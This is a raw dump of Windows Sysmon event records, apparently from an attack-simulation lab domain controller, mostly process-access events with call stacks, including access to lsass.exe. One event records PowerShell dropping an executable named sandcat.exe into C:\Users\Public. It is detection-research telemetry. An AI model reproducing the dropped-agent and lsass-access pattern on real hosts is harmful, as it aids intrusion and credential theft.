13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.586{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.524{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.524{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.524{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:53:10.430{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2020-12-08 13:52:03.197 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.946{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.946{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.946{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:09.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 